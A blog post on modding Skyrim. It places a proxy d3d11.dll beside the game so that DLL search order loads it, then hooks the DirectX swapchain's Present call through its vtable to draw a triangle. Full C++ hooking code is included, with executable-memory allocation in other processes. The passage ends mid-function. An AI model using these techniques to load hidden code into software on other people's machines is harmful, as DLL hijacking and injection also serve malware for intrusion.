The blog of Kyle Halladay

Hooking and Hijacking DirectX 11 Functions In Skyrim

2021-07-14T00:00:00+00:00

My last post was a deep dive into the nuts and bolts of how function hooking works, so for my next project I wanted to focus less on how hooking works, and more on how to use it to do something cool. I started looking at function hooking because I wanted to understand how ReShade works, so I decided that I’d take a baby step closer to that goal and draw a triangle across the screen in a real game. I’m a huge Skyrim fan, and it seemed like as good a candidate as any, so that’s what I went with.

This post is going to take it for granted that you already know how function hooking works. If you don’t, and that sounds interesting, see my previous post, or my hooking-by-example project.

Note: if you're looking for modern C++, clean code or best practices, turn back now

As usual with things I write about, all the code for this project is up on github, so if you just want to see the code, have at it!

DLL Hijacking is the New DLL Injection

I’ve built a few projects that have used process injection to get programs to run code they didn’t intend to, so for this project I decided to try something new. Instead of injecting a dll containing the code to draw a triangle, I decided to abuse Windows’ DLL search order to get Skyrim to load a dll full of my code during startup.

Whenever a program loads a DLL by name, Windows searches a number of pre-set locations for that DLL and loads the first one it finds. The directory containing the program’s executable comes before the system directory in that search order. I knew that Skyrim uses DirectX 11 for its renderer, which means that it loads d3d11.dll during startup. My plan was to create my own dll, call it d3d11.dll, and place it in the same directory as Skyrim’s executable.

This dll would sit in between the game code and the real version of d3d11.dll. For functions I didn’t want to add any additional sauce to, my code would call the real dll’s version of that function and return the result. In cases where I wanted to add my own logic, I could intercept any function call I wanted and insert that logic before or after calling the real D3D11.dll’s function. DLLs that do this are called “proxy” dlls. This isn’t a new idea by any means, there’s tons of projects and literature out there for using proxy dlls for everything (including game hacking). Also I stole the idea from ReShade.

Creating a proxy version of d3d11.dll that contains every function exported by the actual library is a chunk of work, but luckily I didn’t have to do that. Instead, I fired up CFF Explorer and took a look at the functions Skyrim actually imports. It turns out this is just a single D3D11.dll export: D3D11CreateDeviceAndSwapChain. No complaints here.

I had never built a proxy dll before, so my first step was to make an empty one (with just a DllMain function), and see what happens if a program loads a dll that doesn’t have the functions it expects it to have. This works as well as you might expect. I put a call to MessageBox() in DllMain to see if things even progressed that far. They didn’t.

I changed my system's language to french once, some things have never changed back

My next step was to try to write a proxy dll that didn’t do anything except forward all calls to D3D11CreateDeviceAndSwapChain to the real version of that function, and return the result. The goal here being that I could get Skyrim to load my dll (confirmed by a call to MessageBox in DLLMain), and run like normal. This is a relatively straightforward process. My .def file already declared that the proxy dll was exporting a function called D3D11CreateDeviceAndSwapChain, so all I had to do was create that function with the right type signature, and in the function body, load the real D3D11 library and call the real D3D11CreateDeviceAndSwapChain function.

typedef HRESULT(__stdcall* fn_D3D11CreateDeviceAndSwapChain)(
  IDXGIAdapter*,
  D3D_DRIVER_TYPE,
  HMODULE,
  UINT,
  const D3D_FEATURE_LEVEL*,
  UINT,
  UINT,
  const DXGI_SWAP_CHAIN_DESC*,
  IDXGISwapChain**,
  ID3D11Device**,
  D3D_FEATURE_LEVEL*,
  ID3D11DeviceContext**);


fn_D3D11CreateDeviceAndSwapChain LoadD3D11AndGetOriginalFuncPointer()
{
  char path[MAX_PATH];
  if (!GetSystemDirectoryA(path, MAX_PATH)) return nullptr;

  strcat_s(path, MAX_PATH * sizeof(char), "\\d3d11.dll");
  HMODULE d3d_dll = LoadLibraryA(path); 

  if (!d3d_dll)
  {
    MessageBox(NULL, TEXT("Could Not Locate Original D3D11 DLL"), TEXT("Darn"), 0);
    return nullptr;
  }

  //GetProcAddress always takes a narrow (ANSI) name, so no TEXT() here
  return (fn_D3D11CreateDeviceAndSwapChain)GetProcAddress(d3d_dll, "D3D11CreateDeviceAndSwapChain");
}


extern "C" HRESULT __stdcall D3D11CreateDeviceAndSwapChain(
  IDXGIAdapter * pAdapter,
  D3D_DRIVER_TYPE            DriverType,
  HMODULE                    Software,
  UINT                       Flags,
  const D3D_FEATURE_LEVEL * pFeatureLevels,
  UINT                       FeatureLevels,
  UINT                       SDKVersion,
  const DXGI_SWAP_CHAIN_DESC * pSwapChainDesc,
  IDXGISwapChain * *ppSwapChain,
  ID3D11Device * *ppDevice,
  D3D_FEATURE_LEVEL * pFeatureLevel,
  ID3D11DeviceContext * *ppImmediateContext
)
{   
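  fn_D3D11CreateDeviceAndSwapChain D3D11CreateDeviceAndSwapChain_Orig = LoadD3D11AndGetOriginalFuncPointer();
  if (!D3D11CreateDeviceAndSwapChain_Orig) return E_FAIL; //couldn't find the real function, bail out instead of crashing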
  
  HRESULT res = D3D11CreateDeviceAndSwapChain_Orig(
    pAdapter, 
    DriverType, 
    Software, 
    Flags, 
    pFeatureLevels, 
    FeatureLevels, 
    SDKVersion, 
    pSwapChainDesc, 
    ppSwapChain, 
    ppDevice, 
    pFeatureLevel, 
    ppImmediateContext);
  
  return res;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD ul_reason_for_call, LPVOID lpvReserved)
{
  if (ul_reason_for_call == DLL_PROCESS_ATTACH)
  {
    MessageBox(NULL, TEXT("Loaded Proxy DLL"), TEXT("Success"), 0);
  }

  return true;
}

I pasted the dll built from this code next to the Skyrim binary (for me: C:\Program Files (x86)\Steam\steamapps\common\Skyrim Special Edition) and launched the game through Steam. The message box popped up, and the game proceeded to play like normal. Perfect.
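One thing the forwarding function above does on every call is load the real library and look the export up again. That’s harmless for a function the game calls once at startup, but a proxy for a hotter export would probably want to resolve the pointer a single time. Here’s a minimal, portable sketch of that pattern. Everything in it is a stand-in I made up for illustration: RealCreateThing plays the role of the real dll’s export, and ResolveRealFunction plays the role of the LoadLibraryA / GetProcAddress pair.

```cpp
#include <cassert>

// Hypothetical signature standing in for the real export's type.
using fn_CreateThing = int (*)(int);

// Stand-in for the function that lives in the real dll.
int RealCreateThing(int x) { return x * 2; }

// Counts how often we "load the library", so the caching is observable.
int g_resolveCount = 0;

// Stand-in for LoadLibraryA + GetProcAddress. The real thing can fail,
// which is why the proxy below still checks for nullptr.
fn_CreateThing ResolveRealFunction()
{
  ++g_resolveCount;
  return &RealCreateThing;
}

// The proxy: same signature as the real function, forwards the call,
// and leaves room for custom logic before or after it.
int ProxyCreateThing(int x)
{
  // function-local static: initialized once, on the first call
  static fn_CreateThing real = ResolveRealFunction();
  if (!real) return -1; // hypothetical error code for "real function missing"

  // custom "before" logic would go here
  int result = real(x);
  // custom "after" logic would go here
  return result;
}
```

Calling ProxyCreateThing twice only resolves the pointer once; the second call goes straight through the cached pointer.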

Finding A Function To Hook

Now that I had my proxy dll minimally working, it was time to use it to do something interesting. I figured it would be pretty easy to add some more code to D3D11CreateDeviceAndSwapChain to set up all the buffers and shaders needed to render a triangle, and then intercept a call to IDXGISwapChain::Present to insert a draw call for that triangle at the end of a frame. There was just one small problem: I had no idea what the address of IDXGISwapChain::Present was, and this is where things take a turn for the hacky.

IDXGISwapChain isn’t really a class, it’s a COM interface. The ppSwapChain pointer returned by D3D11CreateDeviceAndSwapChain is a pointer to something that implements said interface, but you never get to see the actual concrete type pointed to by that pointer, so I couldn’t just make a function pointer to the concrete implementation of Present(). The one saving grace in all this is that I knew that whatever ppSwapChain pointed to, it had a vtable. Somewhere in memory, I already had a pointer to the Present function, I just needed to figure out how to get it.

First, I needed to get a pointer to the vtable for the swapchain that gets created by the call to CreateDeviceAndSwapChain. This meant adding the following perfectly reasonable line of code to my proxy CreateDeviceAndSwapChain function (right before the return statement):

void** swapChainVTable = *reinterpret_cast<void***>(*ppSwapChain);

Then I threw a breakpoint right after that line so I could see the value of swapChainVTable in the VS debugger. By itself, this isn’t super helpful, since it’s just a pointer to the first element in the vtable, but in the course of doing this I learned a new Visual Studio trick to help out here. If you add a watch for a variable, and then add a suffix to the name of that watch like “, 50”, Visual Studio will give you a debug view that assumes swapChainVTable is a pointer to an array, and show you the next 50 elements in that array. So I created a watch for “swapChainVTable,50” which showed me the first 50 pointers in the swapchain object’s vtable.

This by itself wasn’t the most useful (although I guess I could have figured out the right function by trial and error). Microsoft publishes the symbols for D3D11.dll though, so I had VS grab those from the Microsoft symbol server and used them to get the function names that corresponded with the vtable memory addresses. Once I had that, I could see that the Present function is the 9th element in the swapchain’s vtable (index 8, counting from zero).

~~Of course, Microsoft could update DXGI and change the ordering of function in the vtable at any time, but it works for now, so yolo.~~ [Edit: As @__silent_ pointed out on twitter, this is rather unlikely, since it would require a whole new DXGI SwapChain interface that didn’t inherit from any previous versions of IDXGISwapChain]
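If the vtable trick feels like magic, here’s a small sketch of the same idea with no D3D11 involved. The interface and class names (IFakeSwapChain, HiddenSwapChain) are made up for illustration. It leans on two assumptions that hold for MSVC x64 and the common Itanium C++ ABI but that the C++ standard doesn’t promise: the vtable pointer sits at the very start of the object, and a member function can be called like a free function that takes the this pointer as its first argument.

```cpp
#include <cassert>
#include <cstring>

// Hypothetical COM-style interface: nothing but pure virtual methods.
struct IFakeSwapChain
{
  virtual int GetWidth() = 0;                                     // vtable slot 0
  virtual int GetHeight() = 0;                                    // vtable slot 1
  virtual int Present(unsigned syncInterval, unsigned flags) = 0; // vtable slot 2
};

// The concrete type the caller never gets to see.
struct HiddenSwapChain : IFakeSwapChain
{
  int GetWidth() override { return 1920; }
  int GetHeight() override { return 1080; }
  int Present(unsigned syncInterval, unsigned flags) override
  {
    return int(syncInterval * 10 + flags);
  }
};

// Factory that only hands out the interface pointer, like D3D11 does.
IFakeSwapChain* CreateFakeSwapChain()
{
  static HiddenSwapChain instance;
  return &instance;
}

// Assumption: the first pointer-sized bytes of the object are its vtable pointer.
// memcpy is used instead of a cast to sidestep strict-aliasing trouble.
void** GetVTable(void* obj)
{
  void** vtable = nullptr;
  std::memcpy(&vtable, obj, sizeof(vtable));
  return vtable;
}

// Assumption: the member function accepts "this" as a plain first argument.
using fn_Present = int (*)(IFakeSwapChain*, unsigned, unsigned);

int CallPresentThroughVTable(IFakeSwapChain* swapChain, unsigned syncInterval, unsigned flags)
{
  void** vtable = GetVTable(swapChain);
  fn_Present present = reinterpret_cast<fn_Present>(vtable[2]);
  return present(swapChain, syncInterval, flags);
}
```

CallPresentThroughVTable never names HiddenSwapChain, yet it ends up in HiddenSwapChain::Present. The raw function address it pulls out of the vtable is the kind of address a hook needs.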

Once I had the actual address, I could re-use the hooking code from my last post and redirect all calls to Present to my own function, which I could use to issue a draw call for the custom triangle prior to actually calling Present().

HRESULT DXGISwapChain_Present_Hook(IDXGISwapChain* thisPtr, UINT SyncInterval, UINT Flags)
{
  //triangle drawing code will go here

  //this is a specific quirk of my hooking code,
  //the address for the function being hooked is stored in a thread-local stack,
  //Getting the address of the original function means calling PopAddress.
  //more details in the "Hooking By Example" project on my github
  fn_DXGISwapChain_Present DXGISwapChain_Present_Orig;
  PopAddress(uint64_t(&DXGISwapChain_Present_Orig));

  //actually call Present
  HRESULT r = DXGISwapChain_Present_Orig(thisPtr, SyncInterval, Flags);
  return r;
}

extern "C" HRESULT __stdcall D3D11CreateDeviceAndSwapChain(
  IDXGIAdapter * pAdapter,
  D3D_DRIVER_TYPE            DriverType,
  HMODULE                    Software,
  UINT                       Flags,
  const D3D_FEATURE_LEVEL * pFeatureLevels,
  UINT                       FeatureLevels,
  UINT                       SDKVersion,
  const DXGI_SWAP_CHAIN_DESC * pSwapChainDesc,
  IDXGISwapChain * *ppSwapChain,
  ID3D11Device * *ppDevice,
  D3D_FEATURE_LEVEL * pFeatureLevel,
  ID3D11DeviceContext * *ppImmediateContext
)
{
  fn_D3D11CreateDeviceAndSwapChain D3D11CreateDeviceAndSwapChain_Orig = LoadD3D11AndGetOriginalFuncPointer();

  HRESULT res = D3D11CreateDeviceAndSwapChain_Orig(pAdapter, DriverType, Software, Flags, pFeatureLevels, FeatureLevels, SDKVersion, pSwapChainDesc, ppSwapChain, ppDevice, pFeatureLevel, ppImmediateContext);

  void** swapChainVTable = *reinterpret_cast<void***>(*ppSwapChain);  
  
  //redirects calls to swapChainVTable[8] to DXGISwapChain_Present_Hook
  //for more details about hooking, see my previous blog post
  InstallHook(swapChainVTable[8], DXGISwapChain_Present_Hook);

  return res;
}
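The 8 in swapChainVTable[8] isn’t arbitrary. IDXGISwapChain inherits from IDXGIDeviceSubObject, which inherits from IDXGIObject, which inherits from IUnknown, and a COM vtable lists the base interfaces’ methods first. Counting the inherited methods gives the slot of the first method IDXGISwapChain declares itself, which is Present. The constant names below are made up for this sketch; the method lists are the ones in the public DXGI headers.

```cpp
#include <cassert>
#include <cstddef>

// Methods contributed by each interface, in inheritance order.
constexpr std::size_t kIUnknownMethods = 3;             // QueryInterface, AddRef, Release
constexpr std::size_t kIDXGIObjectMethods = 4;          // SetPrivateData, SetPrivateDataInterface, GetPrivateData, GetParent
constexpr std::size_t kIDXGIDeviceSubObjectMethods = 1; // GetDevice

// Present is the first method IDXGISwapChain adds, so its index is
// simply the number of inherited methods that come before it.
constexpr std::size_t kPresentVTableIndex =
  kIUnknownMethods + kIDXGIObjectMethods + kIDXGIDeviceSubObjectMethods;

static_assert(kPresentVTableIndex == 8, "Present should land in vtable slot 8");
```

This is also why the ordering is unlikely to change: newer swapchain interfaces inherit from this one, so their methods get appended after the existing slots.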

Actually Drawing a Triangle

Once I had the IDXGISwapChain::Present hook working, the rest of this project fell into place pretty quickly. I added all the normal D3D11 calls for creating a mesh, compiling shaders, etc to CreateDeviceAndSwapChain (after device creation), and then added the draw commands for the triangle to the Present hook, before having that hook call the regular Present function. Rather than try to shove hlsl code in my cpp files, I just had the code look for a folder called “hook_content” in the same directory as the hooked binary, and load the shaders from there. Yet another idea I stole from ReShade.
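Finding that folder boils down to taking the full path of the game’s executable, chopping off the file name, and appending the content folder and shader name. My code does this with GetModuleFileNameA, PathRemoveFileSpecA and strcat_s; the sketch below shows the same string surgery in portable C++. HookContentPath is a hypothetical helper, not something from the project.

```cpp
#include <cassert>
#include <cstddef>
#include <string>

// Builds "<directory of exe>\hook_content\<fileName>" from the full path of
// the executable. Accepts either slash style in the input path.
std::string HookContentPath(const std::string& exePath, const std::string& fileName)
{
  const std::size_t lastSeparator = exePath.find_last_of("\\/");

  // no separator means the path is just a file name, so use the current directory
  const std::string directory =
    (lastSeparator == std::string::npos) ? std::string(".") : exePath.substr(0, lastSeparator);

  return directory + "\\hook_content\\" + fileName;
}
```

Using std::string also avoids the fixed 512 byte buffers, at the cost of converting to a wide string before handing the path to D3DCompileFromFile.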

The resulting code is simple enough to be a D3D11 tutorial project, so I’m just going to paste it below for reference and not waste much time talking about it. I’ve included all the hooking code too. As mentioned, the entire project (including the test d3d11 app I built) is also on github.

Full DX11 Hooking Code

#pragma once
#include <Windows.h>
#include "debug.h"
#include <stdint.h>
#include <d3dcompiler.h>
#include <d3d11.h>
#include <d3d11_4.h>
#include <shlwapi.h>
#include "hooking.h"

#pragma comment (lib, "Shlwapi.lib") //for PathRemoveFileSpecA
#pragma comment(lib, "d3dcompiler.lib")


typedef HRESULT(__stdcall* fn_D3D11CreateDeviceAndSwapChain)(
  IDXGIAdapter*,
  D3D_DRIVER_TYPE,
  HMODULE,
  UINT,
  const D3D_FEATURE_LEVEL*,
  UINT,
  UINT,
  const DXGI_SWAP_CHAIN_DESC*,
  IDXGISwapChain**,
  ID3D11Device**,
  D3D_FEATURE_LEVEL*,
  ID3D11DeviceContext**);

typedef HRESULT(__stdcall* fn_DXGISwapChain_Present)(IDXGISwapChain*, UINT, UINT);

IDXGISwapChain* swapChain = nullptr;
ID3D11Device5* device = nullptr;
ID3D11DeviceContext4* devCon = nullptr;
ID3D10Blob* vs_blob = nullptr;
ID3D11VertexShader* vs = nullptr;
ID3D10Blob* ps_blob = nullptr;
ID3D11PixelShader* ps = nullptr;
ID3D11Buffer* vertex_buffer = nullptr;
ID3D11InputLayout* vertLayout = nullptr;
ID3D11RasterizerState* SolidRasterState = nullptr;
ID3D11DepthStencilState* SolidDepthStencilState = nullptr;

HRESULT DXGISwapChain_Present_Hook(IDXGISwapChain* thisPtr, UINT SyncInterval, UINT Flags)
{
  devCon->VSSetShader(vs, 0, 0);
  devCon->PSSetShader(ps, 0, 0);
  devCon->IASetInputLayout(vertLayout);
  devCon->RSSetState(SolidRasterState);
  devCon->OMSetDepthStencilState(SolidDepthStencilState, 0);

  UINT stride = sizeof(float) * 6;
  UINT offset = 0;
  devCon->IASetVertexBuffers(0, 1, &vertex_buffer, &stride, &offset);
  devCon->IASetPrimitiveTopology(D3D11_PRIMITIVE_TOPOLOGY_TRIANGLELIST);
  devCon->Draw(3, 0);


  fn_DXGISwapChain_Present DXGISwapChain_Present_Orig;
  PopAddress(uint64_t(&DXGISwapChain_Present_Orig));

  HRESULT r = DXGISwapChain_Present_Orig(thisPtr, SyncInterval, Flags);
  return r;
}


void LoadShaders()
{
  {
    char filepath[512];
    HMODULE hModule = GetModuleHandle(NULL);
    GetModuleFileNameA(hModule, filepath, 512);
    PathRemoveFileSpecA(filepath);

    strcat_s(filepath, 512, "\\hook_content\\passthrough_vs.shader");

    wchar_t wPath[513];
    size_t outSize;

    mbstowcs_s(&outSize, &wPath[0], strlen(filepath) + 1, filepath, strlen(filepath));
    ID3D10Blob* compileErrors = nullptr;

    HRESULT err = D3DCompileFromFile(wPath, 0, 0, "main", "vs_5_0", 0, 0, &vs_blob, &compileErrors);
    if (compileErrors != nullptr && compileErrors)
    {
      ID3D10Blob* outErrorsDeref = compileErrors;
      OutputDebugStringA((char*)compileErrors->GetBufferPointer());
    }

    err = device->CreateVertexShader(vs_blob->GetBufferPointer(), vs_blob->GetBufferSize(), NULL, &vs);
    check(err == S_OK);
  }
  {
    char filepath[512];
    HMODULE hModule = GetModuleHandle(NULL);
    GetModuleFileNameA(hModule, filepath, 512);
    PathRemoveFileSpecA(filepath);

    strcat_s(filepath, 512, "\\hook_content\\vertex_color_ps.shader");

    wchar_t wPath[513];
    size_t outSize;

    mbstowcs_s(&outSize, &wPath[0], strlen(filepath) + 1, filepath, strlen(filepath));
    ID3D10Blob* compileErrors = nullptr; //initialized so the null check below is meaningful

    HRESULT err = D3DCompileFromFile(wPath, 0, 0, "main", "ps_5_0", 0, 0, &ps_blob, &compileErrors);
    if (compileErrors != nullptr && compileErrors)
    {
      ID3D10Blob* outErrorsDeref = compileErrors;
      OutputDebugStringA((char*)compileErrors->GetBufferPointer());
    }

    err = device->CreatePixelShader(ps_blob->GetBufferPointer(), ps_blob->GetBufferSize(), NULL, &ps);
    check(err == S_OK);
  }
}


void CreateMesh()
{
  const float vertData[] =
  {
    -1, -1, 0.1,  1,0,0,
    1, 1, 0.1,  0,1,0,
    -1, 1, 0.1,  0,0,1
  };

  D3D11_BUFFER_DESC vertBufferDesc;
  ZeroMemory(&vertBufferDesc, sizeof(vertBufferDesc));
  vertBufferDesc.Usage = D3D11_USAGE_DEFAULT;
  vertBufferDesc.ByteWidth = sizeof(float) * 6 * 3; //6 floats per vert, 3 verts
  vertBufferDesc.BindFlags = D3D11_BIND_VERTEX_BUFFER;
  vertBufferDesc.CPUAccessFlags = 0;
  vertBufferDesc.MiscFlags = 0;

  D3D11_SUBRESOURCE_DATA vertBufferData;
  ZeroMemory(&vertBufferData, sizeof(vertBufferData));
  vertBufferData.pSysMem = vertData;

  HRESULT res = device->CreateBuffer(&vertBufferDesc, &vertBufferData, &vertex_buffer);
  check(res == S_OK);
}


void CreateInputLayout()
{
  D3D11_INPUT_ELEMENT_DESC vertElements[] =
  {
    {"POSITION", 0, DXGI_FORMAT_R32G32B32_FLOAT, 0, 0,D3D11_INPUT_PER_VERTEX_DATA, 0},
    {"COLOR", 0, DXGI_FORMAT_R32G32B32_FLOAT, 0, 12, D3D11_INPUT_PER_VERTEX_DATA, 0}
  };

  HRESULT err = device->CreateInputLayout(vertElements, _countof(vertElements), vs_blob->GetBufferPointer(), vs_blob->GetBufferSize(), &vertLayout);
  check(err == S_OK);
}

void CreateRasterizerAndDepthStates()
{
  D3D11_RASTERIZER_DESC soliddesc;
  ZeroMemory(&soliddesc, sizeof(D3D11_RASTERIZER_DESC));
  soliddesc.FillMode = D3D11_FILL_SOLID;
  soliddesc.CullMode = D3D11_CULL_NONE;
  HRESULT err = device->CreateRasterizerState(&soliddesc, &SolidRasterState);
  check(err == S_OK);

  D3D11_DEPTH_STENCIL_DESC depthDesc;
  ZeroMemory(&depthDesc, sizeof(D3D11_DEPTH_STENCIL_DESC));
  depthDesc.DepthEnable = true;
  depthDesc.DepthWriteMask = D3D11_DEPTH_WRITE_MASK_ALL;
  depthDesc.DepthFunc = D3D11_COMPARISON_ALWAYS;
  err = device->CreateDepthStencilState(&depthDesc, &SolidDepthStencilState);
  check(err == S_OK);
}

fn_D3D11CreateDeviceAndSwapChain LoadD3D11AndGetOriginalFuncPointer()
{
  char path[MAX_PATH];
  if (!GetSystemDirectoryA(path, MAX_PATH)) return nullptr;

  strcat_s(path, MAX_PATH * sizeof(char), "\\d3d11.dll");
  HMODULE d3d_dll = LoadLibraryA(path); 

  if (!d3d_dll)
  {
    MessageBox(NULL, TEXT("Could Not Locate Original D3D11 DLL"), TEXT("Darn"), 0);
    return nullptr;
  }

  //GetProcAddress always takes a narrow (ANSI) name, so no TEXT() here
  return (fn_D3D11CreateDeviceAndSwapChain)GetProcAddress(d3d_dll, "D3D11CreateDeviceAndSwapChain");
}

inline void** get_vtable_ptr(void* obj)
{
  return *reinterpret_cast<void***>(obj);
}

extern "C" HRESULT __stdcall D3D11CreateDeviceAndSwapChain(
  IDXGIAdapter * pAdapter,
  D3D_DRIVER_TYPE            DriverType,
  HMODULE                    Software,
  UINT                       Flags,
  const D3D_FEATURE_LEVEL * pFeatureLevels,
  UINT                       FeatureLevels,
  UINT                       SDKVersion,
  const DXGI_SWAP_CHAIN_DESC * pSwapChainDesc,
  IDXGISwapChain * *ppSwapChain,
  ID3D11Device * *ppDevice,
  D3D_FEATURE_LEVEL * pFeatureLevel,
  ID3D11DeviceContext * *ppImmediateContext
)
{
  MessageBox(NULL, TEXT("Calling D3D11CreateDeviceAndSwapChain"), TEXT("Ok"), 0);

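  fn_D3D11CreateDeviceAndSwapChain D3D11CreateDeviceAndSwapChain_Orig = LoadD3D11AndGetOriginalFuncPointer();
  if (!D3D11CreateDeviceAndSwapChain_Orig) return E_FAIL; //couldn't find the real function, bail out instead of crashing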

  HRESULT res = D3D11CreateDeviceAndSwapChain_Orig(pAdapter, DriverType, Software, Flags, pFeatureLevels, FeatureLevels, SDKVersion, pSwapChainDesc, ppSwapChain, ppDevice, pFeatureLevel, ppImmediateContext);

  HRESULT hr = (*ppDevice)->QueryInterface(__uuidof(ID3D11Device5), (void**)&device);
  hr = (*ppImmediateContext)->QueryInterface(__uuidof(ID3D11DeviceContext4), (void**)&devCon); //IID should match devCon's type

  LoadShaders();
  CreateMesh();
  CreateInputLayout();
  CreateRasterizerAndDepthStates();

  swapChain = *ppSwapChain;
  void** swapChainVTable = get_vtable_ptr(swapChain);
  
  InstallHook(swapChainVTable[8], DXGISwapChain_Present_Hook);
  //present is [8];

  return res;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD ul_reason_for_call, LPVOID lpvReserved)
{
  if (ul_reason_for_call == DLL_PROCESS_ATTACH)
  {
    MessageBox(NULL, TEXT("Target app has loaded your proxy d3d11.dll and called DllMain. If you're launching Skyrim via steam, you need to dismiss this popup quickly, otherwise you get a load error"), TEXT("Success"), 0);
  }

  return true;
}

Hooking Code

Hooking.h:

#pragma once
#include <Windows.h>
#include <stdint.h>


void InstallHook(void* func2hook, void* payloadFunc);
__declspec(noinline) void PopAddress(uint64_t trampolinePtr);

Hooking.cpp:

#include "hooking.h"
#include <Windows.h>
#include <stack>
#include <stdio.h>
#include <memoryapi.h>
#include <wow64apiset.h> // for checking if process is 64 bit
#include <TlHelp32.h> //for PROCESSENTRY32, needs to be included after windows.h
#include <Psapi.h>
#include <stdint.h>
#include "capstone/x86.h"
#include "capstone/capstone.h"
#include "debug.h"

thread_local std::stack<uint64_t> hookJumpAddresses;


#if _WIN64
typedef uint64_t addr_t;
#else 
typedef uint32_t addr_t;
#endif

bool IsProcess64Bit(HANDLE process)
{
  BOOL isWow64 = false;
  IsWow64Process(process, &isWow64);

  if (isWow64)
  {
    //process is 32 bit, running on 64 bit machine
    return false;
  }
  else
  {
    SYSTEM_INFO sysInfo;
    GetSystemInfo(&sysInfo);
    return sysInfo.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_AMD64;
  }
}

void* AllocPageInTargetProcess(HANDLE process)
{
  SYSTEM_INFO sysInfo;
  GetSystemInfo(&sysInfo);
  int PAGE_SIZE = sysInfo.dwPageSize;

  void* newPage = VirtualAllocEx(process, NULL, PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  return newPage;
}


void* AllocPage()
{
  SYSTEM_INFO sysInfo;
  GetSystemInfo(&sysInfo);
  int PAGE_SIZE = sysInfo.dwPageSize;

  void* newPage = VirtualAlloc(NULL, PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  return newPage;
}

void* AllocatePageNearAddressRemote(HANDLE handle, void* targetAddr)
{
  check(IsProcess64Bit(handle));

  SYSTEM_INFO sysInfo;
  GetSystemInfo(&sysInfo);
  const uint64_t PAGE_SIZE = sysInfo.dwPageSize;

  uint64_t startAddr = (uint64_t(targetAddr) & ~(PAGE_SIZE - 1)); //round down to nearest page boundary
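  //clamp the search window to what a rel32 jump can reach (+/- ~2GB) AND to the valid application address range
  const uint64_t minAppAddr = (uint64_t)sysInfo.lpMinimumApplicationAddress;
  const uint64_t maxAppAddr = (uint64_t)sysInfo.lpMaximumApplicationAddress;
  uint64_t minAddr = (startAddr > 0x7FFFFF00) ? max(startAddr - 0x7FFFFF00, minAppAddr) : minAppAddr; //guards against unsigned underflow
  uint64_t maxAddr = min(startAddr + 0x7FFFFF00, maxAppAddr);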

  uint64_t startPage = (startAddr - (startAddr % PAGE_SIZE));

  uint64_t pageOffset = 1;
  while (1)
  {
    uint64_t byteOffset = pageOffset * PAGE_SIZE;
    uint64_t highAddr = startPage + byteOffset;
    uint64_t lowAddr = (startPage > byteOffset) ? startPage - byteOffset : 0;

    bool needsExit = highAddr > maxAddr && lowAddr < minAddr;

    if (highAddr < maxAddr)
    {
      void* outAddr = VirtualAllocEx(handle, (void*)highAddr, (size_t)PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
      if (outAddr)
        return outAddr;
    }

    if (lowAddr > minAddr)
    {
      void* outAddr = VirtualAllocEx(handle, (void*)lowAddr, (size_t)PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
      if (outAddr != nullptr)
        return outAddr;
    }

    pageOffset++;

    if (needsExit)
    {
      break;
    }
  }

  return nullptr;
}

void* AllocatePageNearAddress(void* targetAddr)
{
  return AllocatePageNearAddressRemote(GetCurrentProcess(), targetAddr);
}

//I use subst to alias my development folder to W: 
//this will rebase any virtual drives made by subst to
//their actual drive equivalent, to prevent conflicts. Likely
//not important for most people and can be ignored
void RebaseVirtualDrivePath(const char* path, char* outBuff, size_t outBuffSize)
{
  memset(outBuff, 0, outBuffSize);

  char driveLetter[3] = { 0 };
  memcpy(driveLetter, path, 2);

  char deviceDrive[512];
  QueryDosDevice(driveLetter, deviceDrive, 512);

  const char* virtualDrivePrefix = "\\??\\";
  char* prefix = strstr(deviceDrive, virtualDrivePrefix);
  if (prefix)
  {
    size_t replacementLen = strlen(deviceDrive) - strlen(virtualDrivePrefix);
    size_t rebasedPathLen = replacementLen + strlen(path) - 2;
    check(rebasedPathLen < outBuffSize);
    memcpy(outBuff, deviceDrive + strlen(virtualDrivePrefix), replacementLen);
    memcpy(outBuff + replacementLen, &path[2], strlen(path) - 2);
  }
  else
  {
    check(strlen(path) < outBuffSize);
    memcpy(outBuff, path, strlen(path));
  }
}

//returns the first module called "name" -> only searches for dll name, not whole path
//ie: somepath/subdir/mydll.dll can be searched for with "mydll.dll"
HMODULE FindModuleInProcess(HANDLE process, const char* name)
{
  char* lowerCaseName = _strdup(name);
  _strlwr_s(lowerCaseName, strlen(name) + 1);

  HMODULE remoteProcessModules[1024];
  DWORD numBytesWrittenInModuleArray = 0;
  BOOL success = EnumProcessModules(process, remoteProcessModules, sizeof(HMODULE) * 1024, &numBytesWrittenInModuleArray);

  if (!success)
  {
    fprintf(stderr, "Error enumerating modules on target process. Error Code %lu \n", GetLastError());
    DebugBreak();
  }

  DWORD numRemoteModules = numBytesWrittenInModuleArray / sizeof(HMODULE);
  CHAR remoteProcessName[256];
  GetModuleFileNameEx(process, NULL, remoteProcessName, 256); //a null module handle gets the process name
  _strlwr_s(remoteProcessName, 256);

  MODULEINFO remoteProcessModuleInfo;
  HMODULE remoteProcessModule = 0; //An HMODULE is just the DLL's base address 

  for (DWORD i = 0; i < numRemoteModules; ++i)
  {
    CHAR moduleName[256];
    CHAR absoluteModuleName[256];
    CHAR rebasedPath[256] = { 0 };
    GetModuleFileNameEx(process, remoteProcessModules[i], moduleName, 256);
    _strlwr_s(moduleName, 256);
    char* lastSlash = strrchr(moduleName, '\\');
    if (!lastSlash) lastSlash = strrchr(moduleName, '/');

    char* dllName = lastSlash + 1;

    if (strcmp(dllName, lowerCaseName) == 0)
    {
      remoteProcessModule = remoteProcessModules[i];

      success = GetModuleInformation(process, remoteProcessModules[i], &remoteProcessModuleInfo, sizeof(MODULEINFO));
      check(success);
      free(lowerCaseName);
      return remoteProcessModule;
    }
    //the following string operations are to account for cases where GetModuleFileNameEx
    //returns a relative path rather than an absolute one, the path we get to the module
    //is using a virtual drive letter (ie: one created by subst) rather than a real drive
    char* err = _fullpath(absoluteModuleName, moduleName, 256);
    check(err);
  }

  free(lowerCaseName);
  return 0;

}

void PrintModulesForProcess(HANDLE process)
{
  HMODULE remoteProcessModules[1024];
  DWORD numBytesWrittenInModuleArray = 0;
